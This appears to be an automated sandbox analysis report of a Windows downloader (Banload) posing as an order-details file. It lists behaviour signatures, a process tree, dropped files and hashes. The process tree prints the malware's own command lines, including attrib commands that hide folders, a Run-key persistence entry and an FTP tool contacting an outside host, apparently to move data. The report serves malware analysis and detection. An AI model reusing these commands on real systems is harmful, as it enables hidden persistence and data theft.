Analysis

  • max time kernel
    10s
  • max time network
    7s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-05-2024 04:40

Errors

Reason
Machine shutdown

General

  • Target

    Order details 20160623103529.exe

  • Size

    2.3MB

  • MD5

    07a4eab7815d7240e9d3d38f7df9be36

  • SHA1

    2fcb5ee484b60dcadd3ef4aa4ab2f6b22f8e78f4

  • SHA256

    14d2a798476194ebc48db82141fa597c7ac6a91094f36a1311d857579c867017

  • SHA512

    4fe7adbfcd46ef19d3ce73f4342a197579d6653c7bba96e65813fe6d076cadc87ff2e0d640035656a044566e21e21dcf4393191f4d6330f25319f476611686ab

  • SSDEEP

    49152:Ipgs8ABpNAcbBicSTgbDgtcBbWRzfYb/kL+agsNFCriQmew54a11Fp:IGs8AvNzXgtcpEfFFC2QVbalp

Malware Config

Signatures

  • Banload

    Banload variants download malicious files, then install and execute the files.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Sets file to hidden 1 TTPs 5 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Modifies registry class 7 IoCs
  • Suspicious use of WriteProcessMemory 47 IoCs
  • Views/modifies file attributes 1 TTPs 5 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Order details 20160623103529.exe
    "C:\Users\Admin\AppData\Local\Temp\Order details 20160623103529.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:720
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobedc.vbs"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:1364
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob03.bat" /quiet /passive /norestart"
        3⤵
        • Checks computer location settings
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:4356
        • C:\Windows\SysWOW64\xcopy.exe
          xcopy /y /h /e /r /k /c *.* "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\"
          4⤵
          • Enumerates system info in registry
          PID:3864
        • C:\Windows\SysWOW64\attrib.exe
          attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead"
          4⤵
          • Sets file to hidden
          • Views/modifies file attributes
          PID:1552
        • C:\Windows\SysWOW64\attrib.exe
          attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\AdobeR"
          4⤵
          • Sets file to hidden
          • Views/modifies file attributes
          PID:5092
        • C:\Windows\SysWOW64\attrib.exe
          attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\ADBR\READER"
          4⤵
          • Sets file to hidden
          • Views/modifies file attributes
          PID:4852
        • C:\Windows\SysWOW64\attrib.exe
          attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER"
          4⤵
          • Sets file to hidden
          • Views/modifies file attributes
          PID:2388
        • C:\Windows\SysWOW64\attrib.exe
          attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR"
          4⤵
          • Sets file to hidden
          • Views/modifies file attributes
          PID:2956
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adob9.vbs"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:1208
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\rea01.bat" /quiet /passive /norestart"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3884
            • C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe
              Adobeta.exe -a -c -d -natpasv -s:01.klm ftp.freehostia.com -s
              6⤵
              • Executes dropped EXE
              PID:3724
            • C:\Windows\SysWOW64\reg.exe
              REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "AdobeA" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\acro4.bat"
              6⤵
              • Adds Run key to start application
              PID:1508
            • C:\Windows\SysWOW64\ipconfig.exe
              ipconfig /all
              6⤵
              • Gathers network information
              PID:4092
            • C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe
              adbr01.exe -f "011.011"
              6⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:4404
              • C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe
                adbr01.exe -f "011.011"
                7⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Modifies registry class
                PID:2336

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\004.afq

    Filesize

    118B

    MD5

    9275864a850bf2c9d21d8b158be4999e

    SHA1

    838ebcbc1a27c9d8dbad268de77877bf892f5223

    SHA256

    ff279561e09b341b77ace01b0d71152e8471e5c8767aedaa16c9096774727511

    SHA512

    ba58a479507bf8e705189e3283ac5a91c11f6ac276efb2e40ee583a1595cbf7c5204c56fab7a46bfae19d7089f25466303f1baafc7d260d86cb48db073786a8d

  • C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\AReader.exe

    Filesize

    124KB

    MD5

    1a1075e5e307f3a4b8527110a51ce827

    SHA1

    f453838ed21020b7ca059244feea8579e5aa74ef

    SHA256

    ddd90e3546e95b0991df26a17cf26fa2f1c20d6a1fd4ffccf1e9b3ec3d3810d5

    SHA512

    b6b70c6cb3cdb05a69c75b86c1fa0fadb38de0391e1fa17daff7d12dfae2a9f483546d9bf1001ff622694fdf8a28b85cd30fc541c25be62df022d22ca17decc1

  • C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob03.bat

    Filesize

    556B

    MD5

    97410477dc9501dffca4ea4b1ae57273

    SHA1

    fb573b3bf4eba734b0f32db1a5b7ff78de36b064

    SHA256

    3836545f759c1ff93892ea0ef81424c8acdef7dc9440e8404bc04662fe7e6f2c

    SHA512

    3d22d0bf5375f3cedc7f6bdc0b2fac8de834a1b80567a2395046c5aada74d87e8338fbd0f787b14dbe3f5914c9a751597f1332d89d19f6d96de195ef334cc915

  • C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob9.vbs

    Filesize

    186B

    MD5

    09082253605a7171f078e26dc308a667

    SHA1

    585286c9fcda5e66e7fdb4e17a7bab6160183d46

    SHA256

    f4c67dc01ce4bf55e1b574009c49d481dad0d33070f53f42bc76807eb5e324ed

    SHA512

    adb4a1fec6feada14b8b4f28730e098a0af19f1e7c2fa0fe684030d1171e56c88813661a2352ce598221853fce3dc8a4bb3b2e1dc80b6471c41d2598f635b1d8

  • C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobedc.vbs

    Filesize

    189B

    MD5

    ce8041824149d8266dbb0ad9688224d7

    SHA1

    3ab653c43ce66681ceaab90193e1a4c95d998090

    SHA256

    0a697bf8507b3f517afe7d67ed0f12f1a8d0edbb72252d75cc7677d6e2e638c5

    SHA512

    e1a205a1665fe5beb3c53cdcff4eb9c66a4773d730215ff87a179f3c825d342f8f7e8b5e65e45e6a1f13dfe7f58a09f5a920ce9416fe231d74ad1d99e60bd21d

  • C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobeta.exe

    Filesize

    256KB

    MD5

    97b8dbcc7b3cc290aef4241df911ac2e

    SHA1

    733ababbcd278821d4e3ee78580841981f26642e

    SHA256

    c44ca1fe145c4f0dcea4efb95171cbf16dfec9fe66a603fbe29c94c21050a023

    SHA512

    4adaa7621e2c858e6541792146260142e1d28683ec1515a743a56bc106ab425edfce856ef3b0d146d63704b34694c9e666a39e3845a097d41cbf465537ec9b25

  • C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\acro4.bat

    Filesize

    139B

    MD5

    89412aba215b6cd18b8a64c4485fa03f

    SHA1

    37089346499f54a7d89262a67d95c8764ab3ca1f

    SHA256

    9607fb2a0e2ea02cd674272680a238d21539071db3c9735818a1abf11ff30ff1

    SHA512

    7afe571b9ad4b67fdf00cecade8645e82471c1c5098b563a2e2d0cff96905f34b6071eb93c86f59850335e7e88d988d6c016553cdbbe1a693e1cdc3082a3790b

  • C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\adbr01.exe

    Filesize

    2.1MB

    MD5

    3351585db91521d6fa543490ac7cd6a5

    SHA1

    9be2b3abf17613d7386f9949cabaedd466902e82

    SHA256

    3f1749d4a96eb85fe2104fef8d871d9696b456615ff3775d484cc2c2431f40b4

    SHA512

    804b293c02a5526b8c7d5dc48edc18cb33e06a07b39a0b3f46d8d34387e1848b245b087fd820a4a14ac4866c85a120837217ddc9bb47ef32e1b5b80f0dc66d30

  • C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\adbr02.exe

    Filesize

    2.1MB

    MD5

    75a35514185cd2c5cf5aab50cc380963

    SHA1

    f1ff1e088f910398a48f4f7dfddec24e6d6d1734

    SHA256

    1cf5eb2f7c5cd5b7d036478d30408212494ab73190172c63df67e66350374937

    SHA512

    ca6bb433fe5fd4ea350dfa40dd80bb6913ea4693b6ba6188e67f55e4211db9975fd7af570546bce0fd877a3bfeceadd4da9ba9c46c6cb69f9963914739e16297

  • C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\rea01.bat

    Filesize

    1KB

    MD5

    ce7ccd3b48dbe8f34db3b2b1222e4fd9

    SHA1

    e25f9947c2b250c98dffd7bfeaca75b4db17dcfd

    SHA256

    6374a35588bd20362e54dff9e8cf0dffba5ba0ec5952a08fb51caea54c5d228e

    SHA512

    ee6b389f29d30a572c7c9837575df7ff197589824c5377f02b7c453572139d4ecc75c5b194a601b953fbb7e692b3929faf8c4e14e7fec51cd25d71658636ef99

  • memory/2336-70-0x0000000000400000-0x00000000006B4000-memory.dmp

    Filesize

    2.7MB

  • memory/2336-57-0x0000000000400000-0x00000000006B4000-memory.dmp

    Filesize

    2.7MB

  • memory/2336-59-0x0000000002960000-0x0000000002B6C000-memory.dmp

    Filesize

    2.0MB

  • memory/2336-63-0x0000000002960000-0x0000000002B6C000-memory.dmp

    Filesize

    2.0MB

  • memory/2336-71-0x0000000000400000-0x00000000006B4000-memory.dmp

    Filesize

    2.7MB

  • memory/2336-72-0x0000000000400000-0x00000000006B4000-memory.dmp

    Filesize

    2.7MB

  • memory/2336-73-0x0000000000400000-0x00000000006B4000-memory.dmp

    Filesize

    2.7MB

  • memory/2336-74-0x0000000002960000-0x0000000002B6C000-memory.dmp

    Filesize

    2.0MB

  • memory/2336-80-0x0000000002960000-0x0000000002B6C000-memory.dmp

    Filesize

    2.0MB

  • memory/2336-83-0x0000000002960000-0x0000000002B6C000-memory.dmp

    Filesize

    2.0MB

  • memory/4404-55-0x0000000000400000-0x00000000006B4000-memory.dmp

    Filesize

    2.7MB

  • memory/4404-86-0x0000000000400000-0x00000000006B4000-memory.dmp

    Filesize

    2.7MB